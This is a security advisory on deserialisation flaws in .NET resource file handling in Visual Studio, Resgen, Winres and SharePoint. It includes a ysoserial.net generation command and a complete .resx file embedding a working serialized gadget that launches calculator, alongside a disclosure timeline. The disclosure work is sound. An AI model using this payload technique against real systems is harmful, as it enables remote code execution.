Back
NCC Group Publication Archive
Cyber Security
Technical advisories

February 8, 2018

7 mins read

Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple Microsoft Products

Vendor: Microsoft
Vendor URL: https://www.microsoft.com/
Versions affected: products before July 2018 patch
Systems Affected: Visual Studio, .NET Framework, SharePoint
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier:
 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8172
 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8260
 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8300
Risk: Medium to High

Summary

A number of deserialisation issues within the resource files (.resx and .resources) were reported to Microsoft in January 2018 by Soroush Dalili from NCC Group. In July 2018, Microsoft issued multiple patches (CVE-2018-8172, CVE-2018-8172, and CVE-2018-8300) for a number of products that were unsafely handling resource files.

Since the July 2018 patch, .resx and .resources files that have the Mark of the Web (MOTW) cannot be opened directly in Visual Studio. The Resgen.exe tool also shows an error when MOTW is in place while the Winres.exe tool shows a warning message at all times. It should be noted that resource files that are extracted from compressed files or downloaded by non-IE/Edge browsers might not have the MOTW and should be handled with care.

Location

.resx and .resources files that were opened the Winres.exe tool.

.resx and .resources files that were compiled or decompiled by the ‘Resgen.exe’ tool.

.resx files that were opened by Visual Studio.

.resx and .resources files that were uploaded to SharePoint for localisation purposes. This was done by deploying SharePoint add-ins that were using resources.

Impact

It was possible to execute code and commands on the affected applications.

Details

The root cause of the vulnerability has been discussed at the following blog post:

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/

As described in the blog post, a serialised object can be embedded in a .resx file using multiple methods. The ysoserial.net project (https://github.com/pwntester/ysoserial.net) can be used to generate payloads.
For instance, in order to open the calculator tool, the following command could be used:

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c calc

In order to use SoapFormatter that is also supported by resources, the ExploitClass class in ysoserial.net should be updated to run calculator (calc.exe) using the ActivitySurrogateSelector gadget.

The generated payload using the payload above can be embedded in a .resx file as shown below:

<?xml version="1.0" encoding="utf-8"?>
<root>
 <!-- 
 Microsoft ResX Schema 
 
 Version 2.0
 
 The primary goals of this format is to allow a simple XML format 
 that is mostly human readable. The generation and parsing of the 
 various data types are done through the TypeConverter classes 
 associated with the data types.
 
 Example:
 
 ... ado.net/XML headers   schema ...
 <resheader name="resmimetype">text/microsoft-resx</resheader>
 <resheader name="version">2.0</resheader>
 <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
 <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
 <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
 <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
 <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
 <value>[base64 mime encoded serialized .NET Framework object]</value>
 </data>
 <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
 <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
 <comment>This is a comment</comment>
 </data>
 
 There are any number of "resheader" rows that contain simple 
 name/value pairs.
 
 Each data row contains a name, and value. The row also contains a 
 type or mimetype. Type corresponds to a .NET class that support 
 text/value conversion through the TypeConverter architecture. 
 Classes that don't support this are serialized and stored with the 
 mimetype set.
 
 The mimetype is used for serialized objects, and tells the 
 ResXResourceReader how to depersist the object. This is currently not 
 extensible. For a given mimetype the value must be set accordingly:
 
 Note - application/x-microsoft.net.object.binary.base64 is the format 
 that the ResXResourceWriter will generate, however the reader can 
 read any of the formats listed below.
 
 mimetype: application/x-microsoft.net.object.binary.base64
 value : The object must be serialized with 
 : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
 : and then encoded with base64 encoding.
 
 mimetype: application/x-microsoft.net.object.soap.base64
 value : The object must be serialized with 
 : System.Runtime.Serialization.Formatters.Soap.SoapFormatter
 : and then encoded with base64 encoding.
 mimetype: application/x-microsoft.net.object.bytearray.base64
 value : The object must be serialized into a byte array 
 : using a System.ComponentModel.TypeConverter
 : and then encoded with base64 encoding.
 -->
 <xsd:schema id="root"  xmlns_xsd="http://www.w3.org/2001/XMLSchema" xmlns_msdata="urn:schemas-microsoft-com:xml-msdata">
 <xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
 <xsd:element name="root" msdata_IsDataSet="true">
 <xsd:complexType>
 <xsd:choice maxOccurs="unbounded">
 <xsd:element name="metadata">
 <xsd:complexType>
 <xsd:sequence>
 <xsd:element name="value" type="xsd:string" minOccurs="0" />
 </xsd:sequence>
 <xsd:attribute name="name" use="required" type="xsd:string" />
 <xsd:attribute name="type" type="xsd:string" />
 <xsd:attribute name="mimetype" type="xsd:string" />
 <xsd:attribute ref="xml:space" />
 </xsd:complexType>
 </xsd:element>
 <xsd:element name="assembly">
 <xsd:complexType>
 <xsd:attribute name="alias" type="xsd:string" />
 <xsd:attribute name="name" type="xsd:string" />
 </xsd:complexType>
 </xsd:element>
 <xsd:element name="data">
 <xsd:complexType>
 <xsd:sequence>
 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata_Ordinal="1" />
 <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata_Ordinal="2" />
 </xsd:sequence>
 <xsd:attribute name="name" type="xsd:string" use="required" msdata_Ordinal="1" />
 <xsd:attribute name="type" type="xsd:string" msdata_Ordinal="3" />
 <xsd:attribute name="mimetype" type="xsd:string" msdata_Ordinal="4" />
 <xsd:attribute ref="xml:space" />
 </xsd:complexType>
 </xsd:element>
 <xsd:element name="resheader">
 <xsd:complexType>
 <xsd:sequence>
 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata_Ordinal="1" />
 </xsd:sequence>
 <xsd:attribute name="name" type="xsd:string" use="required" />
 </xsd:complexType>
 </xsd:element>
 </xsd:choice>
 </xsd:complexType>
 </xsd:element>
 </xsd:schema>
 <resheader name="resmimetype">
 <value>text/microsoft-resx</value>
 </resheader>
 <resheader name="version">
 <value>2.0</value>
 </resheader>
 <resheader name="reader">
 <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
 </resheader>
 <resheader name="writer">
 <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
 </resheader>
 <assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
 <data name="test" mimetype="application/x-microsoft.net.object.binary.base64">
 <value> AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAAcvYyBjYWxjBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=</value>
 </data>
</root>

This file could be compiled using the Resgen.exe tool to create a .resources extension.

Recommendation

Update the affected applications.

Please note that Visual Studio might need to be manually updated. Ensure that the Visual Studio Command Prompt also uses the latest version of Microsoft SDKs (.NET 4.7.2 at the time writing this advisory).

Vendor Communication

24/01/2018 .NET resources issues were reported for VS, .Net Framework tools, and IIS
26/01/2018 Microsoft asked to have the issues in separate reports/emails
02/02/2018 Reports were separated and sent to Microsoft
05/02/2018 SharePoint Online/on-prem RCE issue via resources were reported
05/02/2018 Microsoft assigned the case numbers and case managers
… SharePoint Online was patched urgently … 
… multiple emails were exchanged regarding the solution …
02/04/2018 Microsoft rejected the possible issue of .NET resources on IIS as a misconfiguration
… additional emails regarding the possible solutions were exchanged …
10/07/2018 Reported issues have been patched

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

Written by:  Soroush Dalili

Published by NCC Group Publication Archive

Here are some related articles you may find interesting

Ghidra nanoMIPS ISA module

Introduction In late 2023 and early 2024, the NCC Group Hardware and Embedded Systems practice undertook an engagement to reverse engineer baseband firmware on several smartphones. This included MediaTek 5G baseband firmware based on the nanoMIPS architecture. While we were aware of some nanoMIPS modules for Ghidra having been developed…

Hardware & Embedded Systems
Reverse Engineering
Tool Release

May 7, 2024

6 mins read

Sifting through the spines: identifying (potential) Cactus ransomware victims

Authored by Willem Zeeman and Yun Zheng Hu This blog is part of a series written by various Dutch cyber security firms that have collaborated on the Cactus ransomware group, which exploits Qlik Sense servers for initial access. To view all of them please check the central blog by Dutch…

Digital Forensics and Incident Response (DFIR)
Fox-IT and European Research
Vulnerability Research

April 25, 2024

7 mins read

Public Report – Confidential Mode for Hyperdisk – DEK Protection Analysis

During the spring of 2024, Google engaged NCC Group to conduct a design review of Confidential Mode for Hyperdisk (CHD) architecture in order to analyze how the Data Encryption Key (DEK) that encrypts data-at-rest is protected. The project was 10 person days and the goal is to validate that the…

Public Reports

April 12, 2024

1 min read

Previous post Next post

View articles by category

Most popular posts

Most recent posts

Call us before you need us.

Our experts will help you.

Get in touch